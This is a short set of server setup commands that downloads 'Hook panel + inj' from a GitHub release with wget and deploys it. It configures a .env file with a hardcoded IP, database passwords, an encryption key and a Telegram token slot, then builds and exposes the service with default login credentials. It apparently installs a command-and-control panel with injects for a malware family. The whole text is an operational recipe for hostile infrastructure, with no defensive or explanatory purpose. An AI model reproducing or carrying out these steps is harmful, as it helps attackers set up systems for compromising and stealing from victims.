"ubuntu 20.04 - ports: 8089,80,5000,50000,3434,12342,8000,3389,3306"


sudo su
cd /var/
apt install unzip && apt install wget
wget https://github.com/rastgeleartikyeter/files/releases/download/asdasdasd/Hook.zip
unzip Hook.zip && rm -rv Builder/ && rm -rv Hook.zip && mv Hook\ panel\ +\ inj/ www
cd www/
sudo apt update -y && sudo apt upgrade -y && sudo apt-get install build-essential -y

nano .env // Edit Manually

BACKEND_INTERFACE=0.0.0.0
BACKEND_PORT=8089
BACKEND_URL=http://172.208.121.27:8089/
BACKEND_DEBUG=true
SOCKET_IO_URL=http://172.208.121.27:3434
FRONTEND_URL=http://172.208.121.27

FRONTEND_INTERFACE=0.0.0.0
FRONTEND_PORT=80

MYSQL_PORT=3306
MYSQL_DATABASE=hook
MYSQL_USER=no-root
MYSQL_ROOT_PASSWORD=S29udG9sU29iZWtoNjI3
MYSQL_PASSWORD=NzZoZVhCYXlU
MYSQL_HOST=mysql

PHP_SOCKETS_PORT=8000
PHP_TCP_PORT=12342

GOLANG_PORT=3434
GOLANG_KEY=1A1zP1eP5QGefi2DMPTfTL5SLmv7Divf
GOLANG_INITIAL_VECTOR=0123456789abcdef

TIMEZONE=Europe/Moscow

TELEGRAM_TOKEN=

rm -rv golang/.env && rm -rv frontend/.env && rm -rv frontend/.env.production

make ports && chmod 777 *

make install && make env

make build

reboot

sudo su

cd /var/www

make build

make build

reboot

http://"Your IP"

token: root
password: changemeplease